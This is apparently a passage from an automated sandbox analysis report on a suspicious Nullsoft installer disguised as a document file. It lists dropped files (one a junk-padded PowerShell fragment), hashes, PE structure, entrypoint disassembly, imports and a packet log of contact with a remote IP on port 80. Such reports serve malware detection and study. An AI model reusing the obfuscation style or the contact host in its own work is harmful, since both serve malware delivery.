                        Preview:$Hyperleucocytoticesiddelsers=$Hyperleucocytoticreadwinners;<#Erythroderma Gitterpunkternes Accelerograph Indrmmer Archie Empiri Whitestraits #><#Svingbro noncandescently Dietitians #><#Baggrundsfarvens Dendritical Oophorectomizing Playboyen #><#udbulinger Toponymous Omsadles Supereconomy #><#Bassisterne Antitarnish Funktionslinierne Decore Spreeing Anachronist Nadver #><#Gallowglass Approbations uva Pentyne #><#Phenobarbitone Regeringsformers Destructively Kantele Missaying Sympolity Tho #><#Decimeteren Hjremargener Wreckages Impoison Fanebreredernes Fldeboller Delefilteret #><#stemmebaandslidelse Patrices Anerkendes Subaerating Cinchonin #><#Hosiomartyr Succesrigere Nuncupative Addenders Phials Snite #><#Revisionsinstitut Ubestrideligt Wearingly skjaldedigtets Feinschmeckeren #><#Venstrekrsel Rabblelike Mnstringer Briter Repaganizes Aleutite #><#terminerede Lagerbeholdningernes Dedicators Smittebrers Skrat #><#Afvigelsens Sandhis Conservable Tabulere Pauperizes Delegationsbesget Kaem
                        Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                        File Type:ASCII text, with no line terminators
                        Category:dropped
                        Size (bytes):60
                        Entropy (8bit):4.038920595031593
                        Encrypted:false
                        SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                        MD5:D17FE0A3F47BE24A6453E9EF58C94641
                        SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                        SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                        SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                        Malicious:false
                        Preview:# PowerShell test file to determine AppLocker lockdown mode
                        Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                        File Type:ASCII text, with no line terminators
                        Category:dropped
                        Size (bytes):60
                        Entropy (8bit):4.038920595031593
                        Encrypted:false
                        SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                        MD5:D17FE0A3F47BE24A6453E9EF58C94641
                        SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                        SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                        SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                        Malicious:false
                        Preview:# PowerShell test file to determine AppLocker lockdown mode
                        File type:PE32 executable (GUI) Intel 80386, for MS Windows, Nullsoft Installer self-extracting archive
                        Entropy (8bit):6.8128663964483165
                        TrID:
                        • Win32 Executable (generic) a (10002005/4) 99.96%
                        • Generic Win/DOS Executable (2004/3) 0.02%
                        • DOS Executable Generic (2002/1) 0.02%
                        • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                        File name:Q20240425 MAX5073626.com.exe
                        File size:794'761 bytes
                        MD5:1c089552c29f12843d8cd8e2bbf5cf5b
                        SHA1:6f3e611fc7d7d5938b99575bcd96366d6e213eab
                        SHA256:76dbfa281b158a18c83d08a907f087b7330da28bdd2298eb9ee2f23c1df40491
                        SHA512:3f6220ce4196ea9ec13ef699a8b8e51e8a7d5035511f8b252230bcc024e423610d5474587030f68dbfc5193bd02402975b6f71e9e352fd17453519748ab3a885
                        SSDEEP:12288:K0Z4SNwhFaoncbHNsyBNzjdsO8aIaLJtBT7bbQ4:J4SO/wbtsQ9jdsFaxl3bbT
                        TLSH:3FF4AF6966481FF2DC3545B5B02F05682A407CF697A0258937E9BB1ADD3E3620F0BF1E
                        File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......?.#!{}Mr{}Mr{}Mr0.Isy}Mr0.Ksz}Mr0.Lst}Mr{}Lr.}Mr..Isp}Mr...rz}Mr..Osz}MrRich{}Mr........................PE..L...j.}d...........
                        Icon Hash:363bec6777792f96
                        Entrypoint:0x4036d7
                        Entrypoint Section:.text
                        Digitally signed:false
                        Imagebase:0x400000
                        Subsystem:windows gui
                        Image File Characteristics:RELOCS_STRIPPED, EXECUTABLE_IMAGE, 32BIT_MACHINE
                        DLL Characteristics:DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                        Time Stamp:0x647DB76A [Mon Jun 5 10:22:34 2023 UTC]
                        TLS Callbacks:
                        CLR (.Net) Version:
                        OS Version Major:5
                        OS Version Minor:1
                        File Version Major:5
                        File Version Minor:1
                        Subsystem Version Major:5
                        Subsystem Version Minor:1
                        Import Hash:66fcdd6338ffed276966867e7cf86116
                        Instruction
                        sub esp, 000003ECh
                        push ebx
                        push ebp
                        push esi
                        push edi
                        xor ebx, ebx
                        mov edi, 00408520h
                        push 00008001h
                        mov dword ptr [esp+14h], ebx
                        mov ebp, ebx
                        call dword ptr [0040816Ch]
                        mov esi, dword ptr [004080A8h]
                        lea eax, dword ptr [esp+2Ch]
                        xorps xmm0, xmm0
                        mov dword ptr [esp+40h], ebx
                        push eax
                        movlpd qword ptr [esp+00000144h], xmm0
                        mov dword ptr [esp+30h], 0000011Ch
                        call esi
                        test eax, eax
                        jne 00007F7EC06945E9h
                        lea eax, dword ptr [esp+2Ch]
                        mov dword ptr [esp+2Ch], 00000114h
                        push eax
                        call esi
                        push 00000053h
                        pop eax
                        mov dl, 04h
                        mov byte ptr [esp+00000146h], dl
                        cmp word ptr [esp+40h], ax
                        jne 00007F7EC06945C3h
                        mov eax, dword ptr [esp+5Ah]
                        add eax, FFFFFFD0h
                        mov word ptr [esp+00000140h], ax
                        jmp 00007F7EC06945BDh
                        xor eax, eax
                        jmp 00007F7EC06945A4h
                        mov dl, byte ptr [esp+00000146h]
                        cmp dword ptr [esp+30h], 0Ah
                        jnc 00007F7EC06945BDh
                        movzx eax, word ptr [esp+38h]
                        mov dword ptr [esp+38h], eax
                        jmp 00007F7EC06945B6h
                        mov eax, dword ptr [esp+38h]
                        mov dword ptr [00429618h], eax
                        movzx eax, byte ptr [esp+30h]
                        shl ax, 0008h
                        movzx ecx, ax
                        movzx eax, byte ptr [esp+34h]
                        or ecx, eax
                        movzx eax, byte ptr [esp+00000140h]
                        shl ax, 0008h
                        shl ecx, 10h
                        movzx eax, word ptr [eax]
                        NameVirtual AddressVirtual Size Is in Section
                        IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                        IMAGE_DIRECTORY_ENTRY_IMPORT0x89f00xa0.rdata
                        IMAGE_DIRECTORY_ENTRY_RESOURCE0x510000x5a758.rsrc
                        IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                        IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                        IMAGE_DIRECTORY_ENTRY_BASERELOC0x00x0
                        IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                        IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                        IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                        IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                        IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                        IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                        IMAGE_DIRECTORY_ENTRY_IAT0x80000x2a8.rdata
                        IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                        IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                        IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0
                        NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                        .text0x10000x6cbc0x6e005b411ce50698b836f7f381f255acfda3False0.6487926136363636data6.362047879428468IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                        .rdata0x80000x184c0x1a00a12a6ad5a12c1c1014103d5a3ad82c3eFalse0.4260817307692308zlib compressed data4.837263923536209IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                        .data0xa0000x1f6200x200169f1b2d62bddf5ac4c33f229d8a6383False0.232421875data1.714042829360118IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                        .ndata0x2a0000x270000x0d41d8cd98f00b204e9800998ecf8427eFalse0empty0.0IMAGE_SCN_CNT_UNINITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                        .rsrc0x510000x5a7580x5a8002bdd97cbc777391a626d43085bde835eFalse0.15502525034530387data4.6552784761352335IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                        NameRVASizeTypeLanguageCountryZLIB Complexity
                        RT_ICON0x513580x42028Device independent bitmap graphic, 256 x 512 x 32, image size 270336EnglishUnited States0.112025475633932
                        RT_ICON0x933800x12428Device independent bitmap graphic, 256 x 512 x 8, image size 65536, 256 important colorsEnglishUnited States0.20847149427746284
                        RT_ICON0xa57a80x25a8Device independent bitmap graphic, 48 x 96 x 32, image size 9600EnglishUnited States0.4521784232365145
                        RT_ICON0xa7d500x10a8Device independent bitmap graphic, 32 x 64 x 32, image size 4224EnglishUnited States0.5143058161350844
                        RT_ICON0xa8df80xea8Device independent bitmap graphic, 48 x 96 x 8, image size 2304, 256 important colorsEnglishUnited States0.40538379530916846
                        RT_ICON0xa9ca00x8a8Device independent bitmap graphic, 32 x 64 x 8, image size 1024, 256 important colorsEnglishUnited States0.4043321299638989
                        RT_ICON0xaa5480x568Device independent bitmap graphic, 16 x 32 x 8, image size 256, 256 important colorsEnglishUnited States0.3388728323699422
                        RT_ICON0xaaab00x468Device independent bitmap graphic, 16 x 32 x 32, image size 1088EnglishUnited States0.650709219858156
                        RT_DIALOG0xaaf180x120dataEnglishUnited States0.5138888888888888
                        RT_DIALOG0xab0380x11cdataEnglishUnited States0.6056338028169014
                        RT_DIALOG0xab1580xc4dataEnglishUnited States0.5918367346938775
                        RT_DIALOG0xab2200x60dataEnglishUnited States0.7291666666666666
                        RT_GROUP_ICON0xab2800x76Targa image data - Map 8 x 9256 x 1 +1EnglishUnited States0.6440677966101694
                        RT_VERSION0xab2f80x1100420 Alliant virtual executable common library not strippedEnglishUnited States0.5992647058823529
                        RT_MANIFEST0xab4080x349XML 1.0 document, ASCII text, with very long lines (841), with no line terminatorsEnglishUnited States0.5552913198573127
                        DLLImport
                        ADVAPI32.dllRegCloseKey, RegDeleteKeyW, RegDeleteValueW, RegEnumKeyW, RegEnumValueW, RegQueryValueExW, RegSetValueExW, OpenProcessToken, AdjustTokenPrivileges, LookupPrivilegeValueW, RegCreateKeyExW, RegOpenKeyExW
                        SHELL32.dllSHFileOperationW, SHBrowseForFolderW, SHGetPathFromIDListW, SHGetFileInfoW, ShellExecuteExW
                        ole32.dllOleInitialize, OleUninitialize, CoTaskMemFree, IIDFromString, CoCreateInstance
                        COMCTL32.dllImageList_Create, ImageList_Destroy, ImageList_AddMasked
                        USER32.dllPeekMessageW, DispatchMessageW, wsprintfA, LoadCursorW, SetClassLongW, GetWindowLongW, GetSysColor, ScreenToClient, SetCursor, GetWindowRect, TrackPopupMenu, AppendMenuW, EnableMenuItem, CreatePopupMenu, GetSystemMenu, GetSystemMetrics, IsWindowEnabled, EmptyClipboard, SetClipboardData, CloseClipboard, OpenClipboard, CheckDlgButton, EndDialog, DialogBoxParamW, IsWindowVisible, SetWindowPos, CreateWindowExW, GetClassInfoW, SetDlgItemTextW, CallWindowProcW, GetMessagePos, CharNextW, ExitWindowsEx, SetWindowTextW, SetTimer, CreateDialogParamW, DestroyWindow, LoadImageW, FindWindowExW, SetWindowLongW, InvalidateRect, ReleaseDC, GetDC, SetForegroundWindow, EnableWindow, GetDlgItem, ShowWindow, IsWindow, PostQuitMessage, SendMessageTimeoutW, SendMessageW, wsprintfW, FillRect, GetClientRect, EndPaint, BeginPaint, DrawTextW, DefWindowProcW, GetDlgItemTextW, CharNextA, CharPrevW, RegisterClassW, MessageBoxIndirectW, SystemParametersInfoW
                        GDI32.dllGetDeviceCaps, SetBkColor, CreateBrushIndirect, SetTextColor, SetBkMode, SelectObject, DeleteObject, CreateFontIndirectW
                        KERNEL32.dllGetLastError, WaitForSingleObject, GetExitCodeProcess, RemoveDirectoryW, GetTempFileNameW, CreateFileW, CreateDirectoryW, WideCharToMultiByte, lstrlenW, lstrcpynW, GlobalLock, GlobalUnlock, CreateThread, GetDiskFreeSpaceW, CopyFileW, GetVersionExW, GetWindowsDirectoryW, ExitProcess, GetCurrentProcess, CreateProcessW, GetTempPathW, SetEnvironmentVariableW, GetCommandLineW, GetModuleFileNameW, GetTickCount, GetFileSize, MultiByteToWideChar, MoveFileW, WritePrivateProfileStringW, GetPrivateProfileStringW, lstrlenA, lstrcmpiW, lstrcmpW, MulDiv, GlobalFree, GlobalAlloc, LoadLibraryExW, GetModuleHandleW, FreeLibrary, Sleep, CloseHandle, SetFileTime, SetFilePointer, SetFileAttributesW, ReadFile, GetShortPathNameW, GetFullPathNameW, GetFileAttributesW, FindNextFileW, FindFirstFileW, FindClose, DeleteFileW, CompareFileTime, SearchPathW, SetCurrentDirectoryW, ExpandEnvironmentStringsW, WriteFile, GetSystemDirectoryW, MoveFileExW, GetModuleHandleA, GetProcAddress, lstrcmpiA, lstrcpyA, lstrcatW, SetErrorMode
                        Language of compilation systemCountry where language is spokenMap
                        EnglishUnited States
                        TimestampSource PortDest PortSource IPDest IP
                        Apr 25, 2024 21:36:46.500327110 CEST4973580192.168.2.4193.239.86.203
                        Apr 25, 2024 21:36:46.811934948 CEST8049735193.239.86.203192.168.2.4
                        Apr 25, 2024 21:36:46.812112093 CEST4973580192.168.2.4193.239.86.203
                        Apr 25, 2024 21:36:46.812903881 CEST4973580192.168.2.4193.239.86.203
                        Apr 25, 2024 21:36:47.124973059 CEST8049735193.239.86.203192.168.2.4
                        Apr 25, 2024 21:36:47.125024080 CEST8049735193.239.86.203192.168.2.4
                        Apr 25, 2024 21:36:47.125066042 CEST8049735193.239.86.203192.168.2.4
                        Apr 25, 2024 21:36:47.125117064 CEST8049735193.239.86.203192.168.2.4
                        Apr 25, 2024 21:36:47.125145912 CEST4973580192.168.2.4193.239.86.203
                        Apr 25, 2024 21:36:47.125152111 CEST8049735193.239.86.203192.168.2.4
                        Apr 25, 2024 21:36:47.125216961 CEST4973580192.168.2.4193.239.86.203
                        Apr 25, 2024 21:36:47.436629057 CEST8049735193.239.86.203192.168.2.4
                        Apr 25, 2024 21:36:47.436671972 CEST8049735193.239.86.203192.168.2.4
                        Apr 25, 2024 21:36:47.436722994 CEST4973580192.168.2.4193.239.86.203
                        Apr 25, 2024 21:36:47.436726093 CEST8049735193.239.86.203192.168.2.4
                        Apr 25, 2024 21:36:47.436753035 CEST4973580192.168.2.4193.239.86.203
                        Apr 25, 2024 21:36:47.436767101 CEST8049735193.239.86.203192.168.2.4
                        Apr 25, 2024 21:36:47.436775923 CEST4973580192.168.2.4193.239.86.203
                        Apr 25, 2024 21:36:47.436806917 CEST8049735193.239.86.203192.168.2.4
                        Apr 25, 2024 21:36:47.436821938 CEST4973580192.168.2.4193.239.86.203
                        Apr 25, 2024 21:36:47.436846972 CEST8049735193.239.86.203192.168.2.4
                        Apr 25, 2024 21:36:47.436857939 CEST4973580192.168.2.4193.239.86.203
                        Apr 25, 2024 21:36:47.436886072 CEST8049735193.239.86.203192.168.2.4
                        Apr 25, 2024 21:36:47.436901093 CEST4973580192.168.2.4193.239.86.203
                        Apr 25, 2024 21:36:47.436923981 CEST8049735193.239.86.203192.168.2.4
                        Apr 25, 2024 21:36:47.436938047 CEST4973580192.168.2.4193.239.86.203
                        Apr 25, 2024 21:36:47.436959028 CEST8049735193.239.86.203192.168.2.4
                        Apr 25, 2024 21:36:47.436974049 CEST4973580192.168.2.4193.239.86.203
                        Apr 25, 2024 21:36:47.749578953 CEST8049735193.239.86.203192.168.2.4
                        Apr 25, 2024 21:36:47.749624968 CEST8049735193.239.86.203192.168.2.4
                        Apr 25, 2024 21:36:47.749679089 CEST8049735193.239.86.203192.168.2.4
                        Apr 25, 2024 21:36:47.749707937 CEST4973580192.168.2.4193.239.86.203
                        Apr 25, 2024 21:36:47.749737024 CEST8049735193.239.86.203192.168.2.4
                        Apr 25, 2024 21:36:47.749751091 CEST4973580192.168.2.4193.239.86.203
                        Apr 25, 2024 21:36:47.749751091 CEST4973580192.168.2.4193.239.86.203
                        Apr 25, 2024 21:36:47.749774933 CEST8049735193.239.86.203192.168.2.4
                        Apr 25, 2024 21:36:47.749806881 CEST4973580192.168.2.4193.239.86.203
                        Apr 25, 2024 21:36:47.749814034 CEST8049735193.239.86.203192.168.2.4
                        Apr 25, 2024 21:36:47.749864101 CEST4973580192.168.2.4193.239.86.203
                        Apr 25, 2024 21:36:47.749891043 CEST8049735193.239.86.203192.168.2.4
                        Apr 25, 2024 21:36:47.749953032 CEST4973580192.168.2.4193.239.86.203
                        Apr 25, 2024 21:36:47.750030994 CEST8049735193.239.86.203192.168.2.4
                        Apr 25, 2024 21:36:47.750088930 CEST8049735193.239.86.203192.168.2.4
                        Apr 25, 2024 21:36:47.750089884 CEST4973580192.168.2.4193.239.86.203
                        Apr 25, 2024 21:36:47.750128984 CEST8049735193.239.86.203192.168.2.4
                        Apr 25, 2024 21:36:47.750144005 CEST4973580192.168.2.4193.239.86.203
                        Apr 25, 2024 21:36:47.750184059 CEST4973580192.168.2.4193.239.86.203
                        Apr 25, 2024 21:36:47.750328064 CEST8049735193.239.86.203192.168.2.4
                        Apr 25, 2024 21:36:47.750366926 CEST8049735193.239.86.203192.168.2.4
                        Apr 25, 2024 21:36:47.750394106 CEST4973580192.168.2.4193.239.86.203
                        Apr 25, 2024 21:36:47.750405073 CEST8049735193.239.86.203192.168.2.4
                        Apr 25, 2024 21:36:47.750417948 CEST4973580192.168.2.4193.239.86.203
                        Apr 25, 2024 21:36:47.750443935 CEST8049735193.239.86.203192.168.2.4
                        Apr 25, 2024 21:36:47.750451088 CEST4973580192.168.2.4193.239.86.203
                        Apr 25, 2024 21:36:47.750498056 CEST4973580192.168.2.4193.239.86.203
                        Apr 25, 2024 21:36:47.750629902 CEST8049735193.239.86.203192.168.2.4
                        Apr 25, 2024 21:36:47.750679016 CEST4973580192.168.2.4193.239.86.203
                        Apr 25, 2024 21:36:47.750776052 CEST8049735193.239.86.203192.168.2.4
                        Apr 25, 2024 21:36:47.750816107 CEST8049735193.239.86.203192.168.2.4
                        Apr 25, 2024 21:36:47.750833988 CEST4973580192.168.2.4193.239.86.203
                        Apr 25, 2024 21:36:47.750849962 CEST8049735193.239.86.203192.168.2.4
                        Apr 25, 2024 21:36:47.750871897 CEST4973580192.168.2.4193.239.86.203
                        Apr 25, 2024 21:36:48.061158895 CEST8049735193.239.86.203192.168.2.4
                        Apr 25, 2024 21:36:48.061203003 CEST8049735193.239.86.203192.168.2.4
                        Apr 25, 2024 21:36:48.061245918 CEST4973580192.168.2.4193.239.86.203
                        Apr 25, 2024 21:36:48.061274052 CEST8049735193.239.86.203192.168.2.4
                        Apr 25, 2024 21:36:48.061288118 CEST4973580192.168.2.4193.239.86.203
                        Apr 25, 2024 21:36:48.061326027 CEST4973580192.168.2.4193.239.86.203
                        Apr 25, 2024 21:36:48.061358929 CEST8049735193.239.86.203192.168.2.4
                        Apr 25, 2024 21:36:48.061420918 CEST4973580192.168.2.4193.239.86.203
                        Apr 25, 2024 21:36:48.061434031 CEST8049735193.239.86.203192.168.2.4
                        Apr 25, 2024 21:36:48.061499119 CEST4973580192.168.2.4193.239.86.203
                        Apr 25, 2024 21:36:48.061507940 CEST8049735193.239.86.203192.168.2.4
                        Apr 25, 2024 21:36:48.061547995 CEST8049735193.239.86.203192.168.2.4
                        Apr 25, 2024 21:36:48.061568975 CEST4973580192.168.2.4193.239.86.203
                        Apr 25, 2024 21:36:48.061598063 CEST4973580192.168.2.4193.239.86.203
                        Apr 25, 2024 21:36:48.061604023 CEST8049735193.239.86.203192.168.2.4
                        Apr 25, 2024 21:36:48.061640024 CEST8049735193.239.86.203192.168.2.4
                        Apr 25, 2024 21:36:48.061664104 CEST4973580192.168.2.4193.239.86.203
                        Apr 25, 2024 21:36:48.061681032 CEST8049735193.239.86.203192.168.2.4
                        Apr 25, 2024 21:36:48.061721087 CEST8049735193.239.86.203192.168.2.4
                        Apr 25, 2024 21:36:48.061744928 CEST4973580192.168.2.4193.239.86.203
                        Apr 25, 2024 21:36:48.061758041 CEST8049735193.239.86.203192.168.2.4
                        Apr 25, 2024 21:36:48.061781883 CEST4973580192.168.2.4193.239.86.203
                        Apr 25, 2024 21:36:48.061805010 CEST4973580192.168.2.4193.239.86.203
                        Apr 25, 2024 21:36:48.061835051 CEST8049735193.239.86.203192.168.2.4
                        Apr 25, 2024 21:36:48.061873913 CEST8049735193.239.86.203192.168.2.4
                        Apr 25, 2024 21:36:48.061894894 CEST4973580192.168.2.4193.239.86.203
                        Apr 25, 2024 21:36:48.061928034 CEST8049735193.239.86.203192.168.2.4
                        Apr 25, 2024 21:36:48.061966896 CEST8049735193.239.86.203192.168.2.4
                        Apr 25, 2024 21:36:48.062005997 CEST8049735193.239.86.203192.168.2.4
                        Apr 25, 2024 21:36:48.062038898 CEST4973580192.168.2.4193.239.86.203
                        Apr 25, 2024 21:36:48.062038898 CEST4973580192.168.2.4193.239.86.203
                        Apr 25, 2024 21:36:48.062038898 CEST4973580192.168.2.4193.239.86.203
                        Apr 25, 2024 21:36:48.062078953 CEST8049735193.239.86.203192.168.2.4
                        Apr 25, 2024 21:36:48.062079906 CEST4973580192.168.2.4193.239.86.203
                        Apr 25, 2024 21:36:48.062133074 CEST4973580192.168.2.4193.239.86.203
                        Apr 25, 2024 21:36:48.062134027 CEST8049735193.239.86.203192.168.2.4
                        Apr 25, 2024 21:36:48.062169075 CEST8049735193.239.86.203192.168.2.4
                        Apr 25, 2024 21:36:48.062186956 CEST4973580192.168.2.4193.239.86.203
                        Apr 25, 2024 21:36:48.062243938 CEST8049735193.239.86.203192.168.2.4
                        Apr 25, 2024 21:36:48.062300920 CEST4973580192.168.2.4193.239.86.203
                        Apr 25, 2024 21:36:48.062365055 CEST8049735193.239.86.203192.168.2.4
                        Apr 25, 2024 21:36:48.062434912 CEST8049735193.239.86.203192.168.2.4
                        Apr 25, 2024 21:36:48.062436104 CEST4973580192.168.2.4193.239.86.203
                        Apr 25, 2024 21:36:48.062473059 CEST8049735193.239.86.203192.168.2.4
                        Apr 25, 2024 21:36:48.062488079 CEST4973580192.168.2.4193.239.86.203
                        Apr 25, 2024 21:36:48.062521935 CEST4973580192.168.2.4193.239.86.203
                        Apr 25, 2024 21:36:48.062546015 CEST8049735193.239.86.203192.168.2.4
                        Apr 25, 2024 21:36:48.062585115 CEST8049735193.239.86.203192.168.2.4
                        Apr 25, 2024 21:36:48.062597990 CEST4973580192.168.2.4193.239.86.203
                        Apr 25, 2024 21:36:48.062623978 CEST8049735193.239.86.203192.168.2.4
                        Apr 25, 2024 21:36:48.062633991 CEST4973580192.168.2.4193.239.86.203
                        Apr 25, 2024 21:36:48.062661886 CEST8049735193.239.86.203192.168.2.4
                        Apr 25, 2024 21:36:48.062676907 CEST4973580192.168.2.4193.239.86.203
                        Apr 25, 2024 21:36:48.062724113 CEST4973580192.168.2.4193.239.86.203
                        Apr 25, 2024 21:36:48.062730074 CEST8049735193.239.86.203192.168.2.4
                        Apr 25, 2024 21:36:48.062768936 CEST8049735193.239.86.203192.168.2.4
                        Apr 25, 2024 21:36:48.062820911 CEST4973580192.168.2.4193.239.86.203
                        Apr 25, 2024 21:36:48.062840939 CEST8049735193.239.86.203192.168.2.4
                        Apr 25, 2024 21:36:48.062875032 CEST8049735193.239.86.203192.168.2.4
                        Apr 25, 2024 21:36:48.062896967 CEST4973580192.168.2.4193.239.86.203
                        Apr 25, 2024 21:36:48.062912941 CEST8049735193.239.86.203192.168.2.4
                        Apr 25, 2024 21:36:48.062952042 CEST8049735193.239.86.203192.168.2.4
                        Apr 25, 2024 21:36:48.062963963 CEST4973580192.168.2.4193.239.86.203
                        Apr 25, 2024 21:36:48.062988997 CEST8049735193.239.86.203192.168.2.4
                        Apr 25, 2024 21:36:48.063004017 CEST4973580192.168.2.4193.239.86.203
                        Apr 25, 2024 21:36:48.063028097 CEST8049735193.239.86.203192.168.2.4
                        Apr 25, 2024 21:36:48.063044071 CEST4973580192.168.2.4193.239.86.203
                        Apr 25, 2024 21:36:48.063060999 CEST8049735193.239.86.203192.168.2.4
                        Apr 25, 2024 21:36:48.063076019 CEST4973580192.168.2.4193.239.86.203
                        Apr 25, 2024 21:36:48.372482061 CEST8049735193.239.86.203192.168.2.4
                        Apr 25, 2024 21:36:48.372523069 CEST8049735193.239.86.203192.168.2.4
                        Apr 25, 2024 21:36:48.372562885 CEST8049735193.239.86.203192.168.2.4
                        Apr 25, 2024 21:36:48.372601986 CEST8049735193.239.86.203192.168.2.4
                        Apr 25, 2024 21:36:48.372615099 CEST4973580192.168.2.4193.239.86.203
                        Apr 25, 2024 21:36:48.372670889 CEST8049735193.239.86.203192.168.2.4
                        Apr 25, 2024 21:36:48.372709990 CEST8049735193.239.86.203192.168.2.4
                        Apr 25, 2024 21:36:48.372711897 CEST4973580192.168.2.4193.239.86.203
                        Apr 25, 2024 21:36:48.372745037 CEST8049735193.239.86.203192.168.2.4
                        Apr 25, 2024 21:36:48.372808933 CEST4973580192.168.2.4193.239.86.203
                        Apr 25, 2024 21:36:48.372826099 CEST8049735193.239.86.203192.168.2.4
                        Apr 25, 2024 21:36:48.372864008 CEST8049735193.239.86.203192.168.2.4
                        Apr 25, 2024 21:36:48.372898102 CEST8049735193.239.86.203192.168.2.4
                        Apr 25, 2024 21:36:48.372934103 CEST4973580192.168.2.4193.239.86.203
                        Apr 25, 2024 21:36:48.373078108 CEST8049735193.239.86.203192.168.2.4
                        Apr 25, 2024 21:36:48.373119116 CEST8049735193.239.86.203192.168.2.4
                        Apr 25, 2024 21:36:48.373152018 CEST8049735193.239.86.203192.168.2.4
                        Apr 25, 2024 21:36:48.373157978 CEST4973580192.168.2.4193.239.86.203
                        Apr 25, 2024 21:36:48.373224020 CEST4973580192.168.2.4193.239.86.203
                        Apr 25, 2024 21:36:48.373492956 CEST8049735193.239.86.203192.168.2.4
                        Apr 25, 2024 21:36:48.373531103 CEST8049735193.239.86.203192.168.2.4
                        Apr 25, 2024 21:36:48.373568058 CEST8049735193.239.86.203192.168.2.4
                        Apr 25, 2024 21:36:48.373591900 CEST4973580192.168.2.4193.239.86.203
                        Apr 25, 2024 21:36:48.373647928 CEST8049735193.239.86.203192.168.2.4
                        Apr 25, 2024 21:36:48.373667002 CEST4973580192.168.2.4193.239.86.203
                        Apr 25, 2024 21:36:48.373722076 CEST8049735193.239.86.203192.168.2.4
                        Apr 25, 2024 21:36:48.373771906 CEST4973580192.168.2.4193.239.86.203
                        Apr 25, 2024 21:36:48.373795033 CEST8049735193.239.86.203192.168.2.4
                        Apr 25, 2024 21:36:48.373828888 CEST8049735193.239.86.203192.168.2.4
                        Apr 25, 2024 21:36:48.373866081 CEST8049735193.239.86.203192.168.2.4
                        Apr 25, 2024 21:36:48.373873949 CEST4973580192.168.2.4193.239.86.203
                        Apr 25, 2024 21:36:48.373939991 CEST8049735193.239.86.203192.168.2.4
                        Apr 25, 2024 21:36:48.373986959 CEST4973580192.168.2.4193.239.86.203
                        Apr 25, 2024 21:36:48.374012947 CEST8049735193.239.86.203192.168.2.4
                        Apr 25, 2024 21:36:48.374052048 CEST8049735193.239.86.203192.168.2.4
                        Apr 25, 2024 21:36:48.374087095 CEST4973580192.168.2.4193.239.86.203
                        Apr 25, 2024 21:36:48.374123096 CEST8049735193.239.86.203192.168.2.4
                        Apr 25, 2024 21:36:48.374159098 CEST4973580192.168.2.4193.239.86.203
                        Apr 25, 2024 21:36:48.374258995 CEST4973580192.168.2.4193.239.86.203
                        Apr 25, 2024 21:36:48.374322891 CEST8049735193.239.86.203192.168.2.4
                        Apr 25, 2024 21:36:48.374357939 CEST8049735193.239.86.203192.168.2.4
                        Apr 25, 2024 21:36:48.374427080 CEST4973580192.168.2.4193.239.86.203
                        Apr 25, 2024 21:36:48.374428988 CEST8049735193.239.86.203192.168.2.4
                        Apr 25, 2024 21:36:48.374525070 CEST4973580192.168.2.4193.239.86.203
                        Apr 25, 2024 21:36:48.374617100 CEST8049735193.239.86.203192.168.2.4
                        Apr 25, 2024 21:36:48.374649048 CEST8049735193.239.86.203192.168.2.4
                        Apr 25, 2024 21:36:48.374696016 CEST4973580192.168.2.4193.239.86.203
                        Apr 25, 2024 21:36:48.374866962 CEST8049735193.239.86.203192.168.2.4
                        Apr 25, 2024 21:36:48.374913931 CEST8049735193.239.86.203192.168.2.4
                        Apr 25, 2024 21:36:48.374953985 CEST8049735193.239.86.203192.168.2.4
                        Apr 25, 2024 21:36:48.374969959 CEST4973580192.168.2.4193.239.86.203
                        Apr 25, 2024 21:36:48.374991894 CEST8049735193.239.86.203192.168.2.4
                        Apr 25, 2024 21:36:48.375021935 CEST4973580192.168.2.4193.239.86.203
                        Apr 25, 2024 21:36:48.375072956 CEST4973580192.168.2.4193.239.86.203
                        Apr 25, 2024 21:36:48.375101089 CEST8049735193.239.86.203192.168.2.4
                        Apr 25, 2024 21:36:48.375140905 CEST8049735193.239.86.203192.168.2.4
                        Apr 25, 2024 21:36:48.375174046 CEST8049735193.239.86.203192.168.2.4
                        Apr 25, 2024 21:36:48.375178099 CEST4973580192.168.2.4193.239.86.203
